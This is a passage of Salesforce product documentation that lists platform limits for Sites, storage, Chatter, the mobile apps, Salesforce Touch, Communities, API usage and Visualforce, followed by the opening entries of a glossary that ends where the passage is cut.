Site.com is a Web content management system (CMS) for building and managing dynamic, data-driven Web pages, and edit
content in real time.

The following table describes the Sites limits for different Salesforce editions.
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Maximum Page
Views

Service Request Time (per
rolling 24-hour period per
site)

Bandwidth Limit (per rolling
24-hour period per site)

Maximum Number
of Sites

Edition

N/A10 minutes500 MB1Developer Edition

500,00030 minutes for sandbox

60 hours for production

1 GB for sandbox

40 GB for production

25Enterprise Edition

1,000,00030 minutes for sandbox

60 hours for production

1 GB for sandbox

40 GB for production

25Unlimited Edition

See Also:
Site.com Import Limits
Force.com Sites Page View Limits
Force.com Site Billing Limits

Site.com Import Limits
The maximum site size you can import is 200 MB.The maximum file size you can import is 50 MB unless you import and
unzip a .zip file. In that case, you can import a .zip file of up to 200 MB if you select Unzip files during the import process.

FORCE.COM SITES LIMITS

Force.com Sites Page View Limits
The following requests count as page views.

Example URLRequests for...

http://mycompany.force.comYour Force.com domain

http://mycompany.comYour custom Web address

http://mycompany.force.com/mypageAny page associated with your site

http://mycompany.force.com/UnauthorizedAuthorization Required error page

n/aAjax requests

The following requests don’t count as page views.
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Example URLRequests for...

http://mycompany.force.com/img/force_logo_w09.gifSalesforce images

http://mycompany.force.com/resource/1233771498000/backgroundYour static resources

http://mycompany.force.com/robots.txtRobots.txt

http://mycompany.force.com/favicon.icoFavorite icon

n/aAttachments and Documents

http://mycompany.force.com/BandwidthExceededError pages, apart from Authorization
Required, such as Limit Exceeded and
Maintenance

http://mycompany.force.com/servlet/rtaImageImages included with an HTML field

http://mycompany.force.com/servlet/fileFieldCustom file field

Limit Exceeded, Maintenance, Page Not Found, and designated Inactive Home pages aren't counted against page view and
bandwidth limits. You can use static resources to brand these pages, but the following limitations apply:

• Static resources must be 50 KB or smaller in size.
• Static resources must be style sheets (CSS), image files, or JavaScript files.
• You can't use Apex controllers for these pages.
• You can't perform SOQL or DML operations from these pages.

Force.com Site Billing Limits
The following terminology applies to Force.com sites limits and billing:

• “Page Views” are calculated as the total number of pages served from either the site's origin server or the cache server .
• “Bandwidth” is calculated as the number of megabytes served and received from both the site's origin server and the cache

server.
• “Service request time” is calculated as the total server time in minutes required to generate pages for the site.
• “Rolling 24-hour period” refers to the 24 hours immediately preceding the current time.
• “Origin server” refers to the Web server that hosts your site.
• “Cache server” refers to the CDN server that serves your cached site pages.
• “Current period” refers to the current calendar month for which you are entitled a certain number of page views for your

organization.

Salesforce.com enforces the following limits on monthly page views for Force.com sites:

• Billing is based on the number of monthly page views purchased for your organization. This page view limit is cumulative
for all sites in your organization.

• If, in a given calendar month, your organization reaches 110% of its page view limit, salesforce.com sends the site and
billing administrators email notification.

• If your organization exceeds 110% of its page view limit for four consecutive calendar months, your sites are disabled until
the next calendar month begins or you purchase more page views. Also, salesforce.com sends email notification to the site
and billing administrators, as well as the related account executive.

• If, in a given calendar month, your organization reaches 300% of its page view limit, your sites are disabled until the next
calendar month begins or you purchase more page views. Also, salesforce.com sends email notification to the site and
billing administrators, as well as the related account executive.
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STORAGE LIMITS

Data and File Storage Limits
Each edition includes a minimum amount of data storage and file storage. Professional, Enterprise, and Unlimited Editions
receive a per-user storage amount multiplied by the number of users in the organization if the result is greater than the minimum
storage amount. Using data storage as an example, an Enterprise Edition organization with 600 users would receive 12,000
MB (12 GB) of data storage, because 20 MB per user multiplied by 600 users is 12,000 MB. A smaller organization, for
example a Professional Edition organization with 20 users, would receive 1 GB of data storage because 20 MB per user
multiplied by 20 users is only 400 MB, which is less than the 1 GB minimum allotted to all Professional Edition organizations.

The only feature license that provides additional storage is Salesforce CRM Content User. Each Salesforce CRM Content
User license provides an additional 512 MB of file storage, whether Salesforce CRM Content is enabled or not, bringing the
total file storage allocation per user to 612 MB. To find out whether your organization has Salesforce CRM Content enabled,
contact your administrator.

See Also:
Storage Allocation Limits

Storage Allocation Limits
The values in the Storage Allocation Per User License column below apply to Salesforce and Salesforce Platform user licenses.

Storage Allocation Per User
License

File Storage Minimum per
Organization

Data Storage Minimum per
Organization

Salesforce Edition

N/A20 MB20 MB (approximately 10,000
records)

Personal

20 MB of data storage and
612 MB of file storage

11 GB1 GBContact Manager

20 MB of data storage and
612 MB of file storage

11 GB1 GBGroup

20 MB of data storage and
612 MB of file storage

11 GB1 GBProfessional

20 MB of data storage and
612 MB of file storage

11 GB1 GB, plus 5 MB for each
Gold Partner license

Enterprise

120 MB of data storage and
612 MB of file storage

11 GB1 GB, plus 5 MB for each
Gold Partner license

Unlimited

N/A20 MB5 MBDeveloper

If your organization uses custom user licenses, contact salesforce.com to determine if these licenses provide additional storage.
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COLLABORATION AND MOBILE APP LIMITS

COLLABORATION LIMITS

Approvals Limits in Chatter
• Approvals in Chatter doesn't support delegated approvers or queues.

• You can't recall or reassign an approval request from a post. Both must be done from the approval record.

• Approval posts can't be deleted in the Salesforce user interface; you can only delete them through the API.

• Approval requests from Sites or portal users aren't supported.

Chatter Plus Limits
Chatter Plus (also known as Chatter Only) is for Unlimited, Enterprise, and Professional Edition users that don’t have
Salesforce licenses but need access to some Salesforce objects in addition to Chatter.

Chatter Plus users can access standard Chatter people, profiles, groups, and files, plus they can

• View Salesforce accounts and contacts

• Use Salesforce CRM Content, Ideas, and Answers

• Modify up to ten custom objects

LimitChatter Plus Feature

UnlimitedChatter Plus licenses in your organization

20 MBData storage per Chatter Plus user

612 MBFile storage per Chatter Plus user

File Limits in Chatter
You can share a file with one or more Chatter users in your company.

File Share Limits

The maximum number of times a file can be shared is 100. This includes files shared with people, groups, and via links. If a
file is privately shared and nears the 100 share maximum, consider making the file public by posting it to your feed.
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File Size Limits

The following are maximum file size limits for files in Salesforce.

Attachments
Related List

Documents TabSalesforce
Knowledge

Salesforce CRM
Content

Files Tab and
Chatter

Feature

5 MB for
attachments

2 GBMaximum File
Size

• 5 MB for file
attachments

• 5 MB• 2 GB
• •10 MB for

Google Docs
20 KB for a
custom-app logo • 2 GB for feed

attachments• 38 MB when
uploaded via the
API

• 10 MB for files
attached to
email• 10 MB when

uploaded via
Visualforce

General Chatter Limits
Chatter Limits by Feature

These limits are subject to change at any time. Contact salesforce.com for more information.

LimitFeature

500People and records you can follow

100Groups you can join

Requests to join private groups count toward this limit. For
example, if you're a member of 90 groups, you can only request
to join 10 more groups.

10,000Groups in your organization

UnlimitedMembers in a Group

25Mentions in a single post or comment

1,000Characters in single post or comment

10,000Characters in a Chatter message

10Number of email notifications sent after you like or comment
on a post

2 GBFile attachment size

100Times a file can be shared

UnlimitedBookmarks

50Favorites

8 MBProfile photo size

3932

General Chatter LimitsCollaboration Limits



LimitFeature

10People you can add to a chat

100People you can add to Chat My Favorites

10Topics on a single post

99Characters in a topic name

Additionally we reserve the right to enforce limits on:

• The length of time that posts, comments, and tracked field changes are stored on the Salesforce servers.
• The number of posts, comments, and tracked field changes available in the Chatter feed. Currently tracked fields without

likes or comments are removed from the feed after 45 days.
• The number of email notifications that can be sent per organization per hour.

Browser Limits for Chatter

Some third-party Web browser plug-ins and extensions can interfere with the functionality of Chatter. If you experience
malfunctions or inconsistent behavior with Chatter, disable all of the Web browser's plug-ins and extensions and try again.

Chatter Mentions Limits

If a person who isn’t a member of a private group is mentioned in a post or comment on that private group, the mention link
displays as gray, unless this mentioned person has “Modify All Data” permission. In this case the link displays in blue. However,
the Salesforce security and sharing rules still apply. People who aren’t a member of a private group don’t have access to the
private group and won’t see or get notified about any updates.

See Also:
Approvals Limits in Chatter
Chatter Plus Limits
File Limits in Chatter
Search Limits for Chatter Content

Search Limits for Chatter Content
Search supports several file types and has limits on file sizes. If a file exceeds the maximum size, the text within the file isn't
searched.

Maximum File Size for Text Within the
File to be Searchable

File ExtensionsFile Type

5 MB.htm, .html, .xhtmlHTML

25 MB.pdfPDF

25 MB.ppt, .pptx, .pptmPPT

5 MB.rtfRTF
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Maximum File Size for Text Within the
File to be Searchable

File ExtensionsFile Type

5 MB.c, .cpp, .css, .csv, .ini, .java,
.log, .sql, .txt

Text

25 MB.doc, .docx, .docmWord

5 MB.xmlXML

5 MB.xls, .xlsx, .xlsmXLS

MOBILE APP LIMITS

Chatter Mobile App Limits
The Chatter mobile app doesn’t have all of the functionality of Chatter on the Web. The following table shows the limitations
of the app on each supported device.

iPadiPhone/iPod
Touch

BlackBerryAndroid

NoNoNoNoUpdate your profile or change your profile photo

YesYesYesNoPost files other than images

NoNoNoNoView the Files page and Chatter feeds for files

NoNoYesNoFollow files and search for files

YesYesYesYesView files related to a person or group

NoNoNoNoSearch for records and follow records

NoNoYesNoSearch for Chatter feed items

NoNoYesNoSearch for updates associated with a topic

NoNoNoNoCreate groups

NoNoNoNoInvite coworkers to sign up for Chatter

NoNoNoNoAdd or view Chatter favorites

YesYesYesYesAccess Chatter as a customer

NoNoYesYesView and send Chatter private messages

YesYesYesNoReceive Chatter push notifications
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Mobile Dashboards for iPad App Limits
The Mobile Dashboards for iPad app doesn’t have all of the functionality of the Dashboards tab in the full Salesforce site.

• You can’t create or edit dashboards.
• Dynamic dashboards and dashboard filters aren’t supported.

Salesforce Classic App Limits
Mobile Device Limits

BlackBerry smartphones • Mobile users running versions 4.0 - 4.3 of the BlackBerry
operating system can still download and install the
Salesforce Classic app; however, the mobile server will
detect the older operating system and send version 11.6 of
Salesforce Classic, which was the last release that supported
BlackBerry operating system versions 4.0 - 4.3. Users on
version 11.6 of Salesforce Classic can't use any of the new
features included in the current release or future releases.

• BlackBerry touchscreen devices use the same Salesforce
Classic app as other BlackBerry devices, so some aspects
of Salesforce Classic aren’t optimized for the touchscreen
interface.

Apple iPhone and iPod Touch devices • Third parties (including, but not limited to, Apple Inc.
and your network connectivity provider) may at any time
restrict, interrupt or prevent use of Salesforce Classic for
the iPhone and iPod touch devices, or delete the Salesforce
Classic app from iPhone or iPod touch devices, or require
salesforce.com to do any of the foregoing, without entitling
the customer to any refund, credit or other compensation
from such third party or salesforce.com.

• Service level agreements don’t apply to the Salesforce
Classic for iPhone product. Additional limitations are
described in the Order Form Supplement for Salesforce
Classic for iPhone, which users are required to accept upon
download or installation of the Salesforce Classic for
iPhone product.

Dashboards Limits

When working with dashboards in Salesforce Classic, these limitations exist:

• You can’t create or edit dashboards.
• Links to custom report details are disabled.
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• The minimum BlackBerry operating system requirement for mobile dashboards is 4.5. Mobile dashboards are compatible
with version 4.2 and 4.3, but tables in the dashboards might not display properly. To find out which operating system is
installed on your BlackBerry smartphone, go to the BlackBerry home screen, and then select Options > About.

See Also:
Chatter Mobile App Limits
Mobile Dashboards for iPad App Limits
Salesforce Touch Limits

Salesforce Touch Limits
Salesforce Touch doesn’t have all of the functionality of the full Salesforce site. There are key differences in these areas of the
app:

• Viewing and working with Salesforce data
• Limits on the amount of data that is displayed
• Creating and editing records
• Chatter feeds and lists
• Salesforce Communities
• Salesforce customizations

Differences Working with Salesforce Data

In this release, users can work with:

• Accounts and Person Accounts
• Campaigns
• Cases
• Contacts
• Contracts
• Events that are accessible from Open Activities or Activity History related lists
• Dashboards
• Leads
• Live Chat Transcripts
• Opportunities and Opportunity Line Items
• Tasks
• User records
• All custom tabs
• Chatter data, including People, Groups, and feeds
• Salesforce Communities (mobile browser app only)

With a few exceptions, all of the standard and custom fields for the objects supported in Salesforce Touch are available.

Note: Salesforce Touch uses user profiles and permission sets, so assuming it’s supported in Salesforce Touch, users
have access to the same tabs, record types, fields, page layouts, and object permissions that they do when working in
the full site.

Currently, Salesforce Touch doesn’t include support for the following:
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• Objects other than those mentioned here
• Standard list views and custom object lists
• A few record fields, including:

◊ Divisions fields
◊ Rich text area fields
◊ Territory management fields

• Some related lists and some related list fields; all related lists are read-only
• Editing dashboards, opportunity line item records, or user records
• Cloning or deleting records
• Submitting records for approval
• Links in formula fields (downloadable apps only)
• Search on objects other than those supported in Salesforce Touch
• Shared Activities for tasks or events
• Archived activities
• Advanced currency management

Note:

Unsupported fields, links to unsupported objects, and unsupported related lists include links to the full Salesforce
site, where you can see the missing information. In addition, the Actions menu on a record detail pane allows you
to switch to the full site so you can perform tasks not currently available in Salesforce Touch.

Salesforce.com provides these links for your convenience but using the full site from Salesforce Touch isn’t officially
supported.

Campaigns

When working with Campaigns in Salesforce Touch:

• Campaign Hierarchy is available only as a related list. The option to View Hierarchy from a link on the campaign detail
page isn’t available. When viewing a parent campaign, the Campaign Hierarchy related list shows only the child campaigns,
while in the full site, both the parent and child campaigns are displayed.

• The Campaign Members related list isn’t available.
• Custom Links to campaign member and campaign influence reports aren’t available.

Cases

When working with Cases in Salesforce Touch:

• Web-to-case fields, including Web Email, Web Name, Web Company, and Web Phone, are always displayed on case
detail pages in Salesforce Touch. In the full Salesforce site, these fields aren’t included on the detail page if the record
doesn’t include web-to-case data.

• The Solutions related list isn’t available in Salesforce Touch.  The Case History and Content Deliveries related lists are
displayed on the Related Lists drop-down but you can’t see any of the records on these lists in Salesforce Touch. In addition,
some related lists for cases—including the Case Milestones, Case Team, Emails, and Entitlements related lists—have links
to records that can’t be viewed in Salesforce Touch. In these situations, Salesforce Touch prompts you to switch to the full
site to see your data.

• If your organization has predefined case teams, the Case Team related list individually lists each team member instead of
displaying a row for the team itself, as is done in the full site. If a user is a member of multiple predefined teams, that user
is only listed once in the related list. View the Case Team related list in the full site to see an accurate list of predefined
case teams.

• Some options for working with Cases aren’t available in this release of Salesforce Touch.  You can’t:
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◊ View the hierarchy for a case
◊ Submit cases for approval
◊ Close cases

Contacts

When working with Contacts in Salesforce Touch, you can’t set up associations between contacts records and Twitter profiles.
If you do the associations in the full site, however, you can see your contacts’ Twitter information directly in the app.

Contracts

When working with Contracts in Salesforce Touch, you can’t update the status of your contracts.

Dashboards

When working with Dashboards in Salesforce Touch:

• Dashboards don’t display filters, source reports, or Visualforce components.
• Dynamic dashboards let you see data as yourself only.
• Chatter feeds for dashboards aren’t available, nor can you post dashboards or components to Chatter.

Leads

When working with Leads in Salesforce Touch, you can’t:

• Convert or share leads
• Find duplicate leads

Live Chat Transcripts

When working with Live Chat Transcripts in Salesforce Touch, you can’t:

• Create live chat transcript records
• View the Body field in transcript records

Limits on How Much Data is Displayed

Salesforce Touch caps the number of items that display in various types of lists. These limits are:

• Chatter Groups and People: 15 records displayed initially, expandable to 200 maximum
• Recent Items: 15 records displayed initially, expandable to 100 maximum
• Related Lists: 30 records displayed initially, not expandable
• Search Results: top 5 results per object displayed, not expandable
• Tasks: 15 records displayed initially; expandable to 100 maximum

Differences Creating and Editing Records

There are some differences from the full site when creating or editing records in Salesforce Touch:

Editing
Records

Creating
RecordsIssueCategory

You can’t modify a record’s owner or its record type.Any Record

You can’t enter data in geolocation custom fields.

Combo boxes, which combine a picklist with a text field, aren’t available. Typically
the text field is available but the picklist is not.
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Editing
Records

Creating
RecordsIssueCategory

If territory management is enabled, you can’t assign or modify a record’s territory
rules.

The Copy Billing Address to Shipping Address and Copy Mailing Address to
Other Address links aren’t available.

Accounts and
Contacts

If territory management is enabled, the Evaluate this account against territory
rules on save option isn’t available when editing account records.

You can’t create or edit event records in Salesforce Touch.Events

You can’t edit the Probability or Forecast Category fields. However,
values are automatically added to these fields (based on the value of the Stage

Opportunities

field) when you save the record. You can manually override the values for these
fields by editing the record in the full site.

If you make an opportunity private, you don’t get a warning that you’re removing
all sharing from the record.

The Subject field doesn’t include a picklist of previously defined subjects.Tasks

If you set the Name field to Lead, the Related To field shouldn’t be available
but it’s editable in Salesforce Touch. You’ll get a validation error if there’s data in
Related To when you save the record.

The Email and Phone fields for an associated contact aren’t displayed.

You can’t use Shared Activities to relate multiple contacts to a task.

You can’t create recurring tasks or change the details for recurring tasks.

Spell-checking the Comments fields isn’t available.

You can’t add attachments.

You can’t send notification emails.

You can’t set task reminders.

Enhanced lookups aren't supported, so you can't use wildcards in lookup searches
and you can't sort, filter, and page through search results.

Lookup Fields

Dependent lookups aren't supported.

Lookup filters aren't respected, so lookup search results aren't restricted in any
way. You may wind up selecting an item that isn't valid for your organization,
resulting in an error message when you save your record.

Salesforce Touch doesn’t apply any formatting to numbers entered in phone
number fields, so if you enter 4155551212, that’s how the phone number is
displayed when you view the record.

Phone Number
Fields

Controlling and dependent picklists are supported, but Salesforce Touch doesn’t
display indicators on create and edit pages for these fields. To determine if a picklist
field is dependent, and which picklist field controls it, switch to the full site.

Picklist Fields
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Editing
Records

Creating
RecordsIssueCategory

Text area fields aren’t scrollable in this release. To access text that isn’t visible in
the field, tap the field to display the keyboard, then touch and hold to bring up

Text Area Fields

the magnifying glass. Slowly drag the magnifying glass through the field until you
see the desired text.

Differences Using Chatter

When using Chatter in Salesforce Touch, you can’t:

• Create or update your profile information, or upload profile pictures
• See the Followers, Following, Groups, and Files Owned lists on profiles
• See Chatter activity statistics or Chatter influence status
• Receive Chatter recommendations
• See trending topics
• Invite coworkers to sign up for Chatter
• Update group settings and information
• Create new groups
• View members of groups or lists of group files
• Invite Chatter customers to join private groups, see that a private group includes Chatter customers, or get a warning that

you’re posting to a group with Chatter customers
• Upload, share, or preview files
• View or download files that were uploaded via the Files tab at the full Salesforce site or that were uploaded to a comment.

You can, however, view files that are attached to a post on a Chatter feed. (The Salesforce Touch downloadable app can
display these file types only: .doc, .docx, .pdf, .ppt, .pptx, .xls, .xlsx, and all image files, including .gif, .jpg,
and .png formats.)

• Find or follow files
• Send or view Chatter messages
• Use publisher actions
• Bookmark posts
• View the list of people who like a Chatter update
• Share public posts
• Add or view Chatter favorites
• Use topics. (You can enter hashtag topics, however. They’ll appear as plain text in Salesforce Touch but work correctly

when viewed in the full site.)
• Search for data in any Chatter feeds, including Groups, People, and Files
• View the full Chatter feed (as with the Feed filter in the full site)
• Filter or follow records
• Use Chatter as a moderator

In addition, when using Chatter on iPhone devices:

• The People and Groups subtabs aren’t available; however, you can access individual profiles and groups from links in the
main Chatter feed.

• You can’t do any filtering of the main Chatter feed.

Differences Using Salesforce Communities

These features aren’t available when using Communities in Salesforce Touch:
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• Customizations using Site.com and Force.com
• Self-service support using Chatter Answers
• Ideas communities
• Objects, related lists, and fields that aren’t supported in this release of Salesforce Touch

Availability of Salesforce Customizations

Salesforce Touch displays custom Visualforce tabs, which allow users to open associated Visualforce pages in a new browser
window.

All other programmatic customizations to the Salesforce interface, however, aren’t currently supported in Salesforce Touch,
including:

• Custom buttons and links
• Web tabs
• Visualforce components other than Visualforce tabs
• S-controls

COMMUNITIES LIMITS

Communities User Limits
To avoid deployment problems and any degradation in service quality, we recommend that the number of users in your
community not exceed the limits listed below. If you require additional users beyond these limits, contact your Salesforce.com
account executive. Exceeding the below limits may result in additional charges and a decrease in functionality.

Number of UsersType of Community

200,000Partner

5 millionCustomer

PLATFORM LIMITS

API Usage Limits
Available in: Professional, Enterprise, Developer, and Database.com Editions

To maintain optimum performance and ensure that the Force.com API is available to all of our customers, salesforce.com
balances transaction loads by imposing two types of limits:
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• Concurrent API Request Limits

• Total API Request Limits

When a call exceeds a request limit, an error is returned.

Concurrent API Request Limits
The following table lists the limits for various types of organizations for concurrent requests (calls) with a duration of 20
seconds or longer.

LimitOrganization Type

5Developer Edition

5Trial organizations

25Production organizations

25Sandbox

Total API Request Limits
The following table lists the limits for the total API requests (calls) per 24-hour period for an organization.

MaximumMinimumAPI Calls Per License TypeSalesforce Edition

1,0001,000N/AAll Editions:
DebuggingHeader on API
testing calls for Apex specified.
Valid in API version 20 and
later.

5,0005,000N/ADeveloper Edition

1,000,0005,000•• Salesforce: 1,000Enterprise Edition
• •Professional Edition with

API access enabled
Force.com App Subscription: 200

• Salesforce Platform: 1,000

Note:  This license is not available
to new customers.

• Force.com - One App: 200

Note:  This license is not available
to new customers.

• Gold Partner: 200

Unlimited.
However, at any

5,000Unlimited Edition • Salesforce: 5,000
• Force.com App Subscription: 200

high limit, it is
likely that other

• Salesforce Platform: 5,000
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MaximumMinimumAPI Calls Per License TypeSalesforce Edition

limiting factors
such as system load

Note:  This license is not available
to new customers.

may prevent you
from using your
entire allocation of• Force.com - One App: 200
calls in a 24–hour
period.

Note:  This license is not available
to new customers.

• Gold Partner: 200

5,000,000N/AN/ASandbox

You can find information for API requests in the API Usage box on the system overview page.

Limits are enforced against the aggregate of all API calls made by the organization in a 24 hour period; limits are not on a
per-user basis. When an organization exceeds a limit, all users in the organization may be temporarily blocked from making
additional calls. Calls will be blocked until usage for the preceding 24 hours drops below the limit.

In the Salesforce application, administrators can view how many API requests have been issued in the last 24 hours on the
Company Information page. Administrators can also view a more detailed report of API usage over the last seven days by
navigating to the Reports tab, selecting the Administrative Reports folder, and clicking the API Usage Last 7 days report.

Note:  Limits are automatically enforced for all editions.

Any action that sends a call to the API counts toward usage limits, except the following:

• Outbound messages
• Apex callouts

You can configure your organization so that email is sent to a designated user when the number of API requests has exceeded
a specified percentage of the limit. You can perform this configuration in from Setup by clicking Monitoring > API Usage
Notifications.

Example API Usage Metering Calculations
The following examples illustrate API usage metering calculations for several scenarios:

• For an Enterprise Edition organization with five Salesforce licenses, the request limit is 5,000 requests (5 licenses X 1,000
calls).

• For an Enterprise Edition organization with 15,000 Salesforce licenses, the request limit is 1,000,000 (the number of
licenses X 1,000 calls is greater than the maximum value, so the lower limit of 1,000,000 is used).

• For a Developer Edition organization that made 4,500 calls at 5:00 AM Wednesday, 499 calls at 11:00 PM Wednesday,
only one more call could successfully be made until 5:00 AM Thursday.

• For an Enterprise Edition organization with 20 Gold Partner licenses, the request limit is 5,000 (the number of licenses
X 200 calls is less than the minimum value of 5,000).
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Increasing Total API Request Limit
The calculation of the API request limit based on user licenses is designed to allow sufficient capacity for your organization
based on your number of users. If you need a higher limit and you don't want to purchase additional user licenses or upgrade
to Unlimited Edition, you can purchase additional API calls. For more information, contact your account representative.

Before you purchase additional API calls, you should perform a due diligence of your current API usage. Client applications,
whether it is your own enterprise applications or partner applications, that make calls to the API can often be optimized to
use fewer API calls to do the same work. If you are using a partner product, you should consult with the vendor to verify that
the product is making optimal use of the API. A product that makes inefficient use of the API will incur unnecessary cost for
your organization.

VISUALFORCE LIMITS

Visualforce Component Limits
Visualforce uses a tag-based markup language for building applications and customize the Salesforce user interface.

The following table describes the limits for Visualforce components and pages.

ValueLimit

40 characters

Page names can’t be longer than 40 characters.

Maximum length of a Visualforce page name (the text in the
URL that uniquely identifies the Visualforce page)

1 MB of text

A single page can hold up to 1 MB of text, or approximately
1,000,000 characters.

Maximum length for source code of a Visualforce page (the
source code, not the rendered response)

1 MB of text

A single component can hold up to 1 MB of text, or
approximately 1,000,000 characters.

Maximum length for source code of a Visualforce component
(the source code)
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Glossary
A  | B  | C  | D  | E  | F  | G  | H  | I  | J  | K  | L  | M  | N  | O  | P  | Q  | R  | S  | T  | U  | V  | W  | X  | Y  | Z

This glossary defines terms that appear throughout the Salesforce documentation suite.

A
Account

An account is an organization, company, or consumer that you want to track—for example, a customer, partner, or
competitor.

Account Assignment Rule
A rule that automatically assigns accounts to territories, based on criteria you define.

Account Team
An account team is a team of users that work together on an account. For example, an account team may include an
executive sponsor, dedicated support representative, or project manager.

Activity (Calendar Events/Tasks)
Planned task or event, optionally related to another type of record such as an account, contact, lead, opportunity, or case.

Administrator (System Administrator)
One or more individuals in your organization who can configure and customize the application. Users assigned to the
System Administrator profile have administrator privileges.

Amount Without Adjustments
Applies to Collaborative Forecasts. The sum of all of a person’s owned revenue opportunities and also his or her
subordinates’ opportunities, without adjustments. Subordinates include everyone reporting up to a person in the forecast
hierarchy.

Amount Without Manager Adjustment
Applies to Collaborative Forecasts. The forecast number as seen by the forecast owner. This is the sum of the owner’s
revenue opportunities and his or her subordinates’ opportunities, including adjustments made on the subordinates’
forecasts.  It doesn’t include adjustments made by forecast managers above the owner in the forecast hierarchy.

Analytic Snapshot
An analytic snapshot lets you report on historical data. Authorized users can save tabular or summary report results to
fields on a custom object, then map those fields to corresponding fields on a target object. They can then schedule when
to run the report to load the custom object's fields with the report's data.

Analytic Snapshot Running User
The user whose security settings determine the source report's level of access to data. This bypasses all security settings,
giving all users who can view the results of the source report in the target object access to data they might not be able to
see otherwise.

Answers
Answers is a feature of the Community application that enables users to ask questions and have community members
post replies. Community members can then vote on the helpfulness of each reply, and the person who asked the question
can mark one reply as the best answer.
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Apex
Apex is a strongly typed, object-oriented programming language that allows developers to execute flow and transaction
control statements on the Force.com platform server in conjunction with calls to the Force.com API. Using syntax that
looks like Java and acts like database stored procedures, Apex enables developers to add business logic to most system
events, including button clicks, related record updates, and Visualforce pages. Apex code can be initiated by Web service
requests and from triggers on objects.

App
Short for “application.” A collection of components such as tabs, reports, dashboards, and Visualforce pages that address
a specific business need. Salesforce provides standard apps such as Sales and Call Center. You can customize the standard
apps to match the way you work. In addition, you can package an app and upload it to the AppExchange along with
related components such as custom fields, custom tabs, and custom objects. Then, you can make the app available to
other Salesforce users from the AppExchange.

App Menu
See Force.com App Menu.

AppExchange
The AppExchange is a sharing interface from salesforce.com that allows you to browse and share apps and services for
the Force.com platform.

Approval Action
See Workflow and Approval Actions.

Approval Process
An approval process is an automated process your organization can use to approve records in Salesforce. An approval
process specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply
to all records included in the process, or just records that meet certain administrator-defined criteria. An approval process
also specifies the actions to take when a record is approved, rejected, recalled, or first submitted for approval.

Article
Articles capture information about your company's products and services that you want to make available in your knowledge
base.

Article Manager
Salesforce uses the term article manager to represent a specific type of user. Article managers can access the Article
Management tab to create, edit, assign, publish, archive, and delete articles. Article managers are sometimes referred to
as knowledge managers. Article managers require the “Manage Articles” user permission. The Article Management tab
is not visible to users without “Manage Articles.”

Article Type
All articles in Salesforce Knowledge are assigned to an article type. An article's type determines the type of content it
contains, its appearance, and which users can access it. For example, a simple FAQ article type might have two custom
fields, Question and Answer, where article managers enter data when creating or updating FAQ articles. A more
complex article type may require dozens of fields organized into several sections. Using layouts and templates,
administrators can structure the article type in the most effective way for its particular content. User access to article
types is controlled by permissions. For each article type, an administrator can grant “Create,” “Read,” “Edit,” or “Delete”
permissions to users. For example, the article manager might want to allow internal users to read, create, and edit FAQ
article types, but let partner users only read FAQs.
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Asset
A specific model or type of product that a customer owns. Depending on how your organization uses assets, they can
represent your products that the customer has purchased and installed or your competitor’s products that the customer
uses.

Assignment
An assignment is a draft article that has been assigned to another user for editing. Assignments may contain brief
instructions and a due date.

Auto-Response Rule
A set of conditions for sending automatic email responses to case or lead submissions based on the attributes of the
submitted record. Applicable cases include those submitted through a Self-Service portal, a Customer Portal, a
Web-to-Case form, an Email-to-Case message, or an On-Demand Email-to-Case message. Applicable leads include
those captured through a Web-to-Lead form.

B
Best Case Amount

Revenue projection in a forecast that identifies total “possible” revenue for a specific month or quarter. For managers,
this should equal the total amount of revenue they and their entire team might possibly generate.

Best Answer
When a member of an answers community asks a question and other community members post a reply, the asker can
mark one of the replies as the best answer. The best answer then appears directly under the question (above the other
replies). Identifying the best answer helps other community members with the same question quickly find the most
relevant, useful information.

Blank lookup
A lookup that is performed when the lookup field dialog does not have a search term.

Bucketing
A tool in the report builder that lets users categorize report records by field, without having to create a formula or a
custom field.

Business Account
A company or organization that you want to track.

C
Campaign

A marketing initiative, such as an advertisement, direct mail, or conference, that you conduct in order to generate
prospects and build brand awareness.

Campaign Hierarchy
A set of up to five campaigns organized into a hierarchy. A parent campaign can have several child campaigns, but a
child campaign can have only one parent.

Campaign Member
Any lead or contact associated with a campaign.
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Campaign ROI (Return On Investment)
The campaign ROI is the return on your marketing investment. Use the Campaign ROI Analysis Report to analyze the
ROI. The ROI is calculated as the net gain (Total Value Won Opps - Actual Cost) divided by the Actual
Cost. The ROI result is expressed as a percentage.

Case
Detailed description of a customer’s feedback, problem, or question. Used to track and solve your customers’ issues.

Category, Solutions
A label you can apply to a solution to group similar solutions together. Solution categories help customer support
representatives find solutions faster when solving cases. If you use the Self-Service portal or public solutions, your
customers can browse solutions by category to find what they need. See also Parent Category.

Category, Ideas
Categories are administrator-defined values that help organize ideas into logical sub-groups within a zone. The View
Category drop-down list on the Ideas tab allows users to filter ideas by category, and the Categories picklist on the
Post Ideas page lets users add categories to their ideas. For example, if your ideas zone has the focus “Improvements to
our clothing line,” then you might set up categories such as “Shirts,” “Jackets,” and “Slacks.” Each organization has one
common set of categories that can be added or removed from each zone. An administrator defines separate categories
for their ideas and answers zones.

Category, Knowledge and Answers
See Data Category for Answers and Data Category for Articles.

Category Group for Answers
In an answers zone, a category group provides one or more categories that help organize questions for easy browsing. If
the category group contains a hierarchy, only the first-level categories display on the Answers tab. For example, if you're
a computer manufacturer you might create a Products category group for your Products zone that has four categories:
Performance Laptops, Portable Laptops, Gaming Desktops, and Enterprise Desktops. Zone members can choose one
of the categories to assign to a question. Administrators create the category group and categories and then associate the
category group with their answers zone.An administrator defines separate categories for their ideas and answers zones.

Category Group for Articles
In Salesforce Knowledge, a category group organizes data categories into a logical hierarchy. For example, to classify
articles by sales regions and business units, create two category groups, Sales Regions and Business Units. The Sales
Regions category group could consist of a geographical hierarchy, such as All Sales Regions as the top level, North
America, Europe, and Asia at the second level, and so on up to five levels. When creating articles, authors assign the
relevant categories to the article. End users searching for articles can search and filter by category.

Channel
A channel refers to the medium by which an article is available. Salesforce Knowledge offers four channels where you
can make articles available.
• Internal App: Salesforce users can access articles in the Articles tab depending on their role visibility.
• Customer: Customers can access articles if the Articles tab is available in the portal. Customer Portal users inherit

the role visibility of the manager on the account.
• Partner: Partners can access articles if the Articles tab is available in the portal. Partner portal users inherit the role

visibility of the manager on the account.
• Public Knowledge Base: Articles can be made available to anonymous users by creating a public knowledge base

using the Sample Public Knowledge Base for Salesforce Knowledge app from the AppExchange. Creating a public
knowledge base requires Sites and Visualforce.

• Your own website. Articles can be made available to users through your company website.
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Channel Manager
Channel managers are the internal users that manage your partners.

Chatter Answers
Chatter Answers is a self-service support community where users can post questions and receive answers and comments
from other users or your support agents.

Chatter Feed
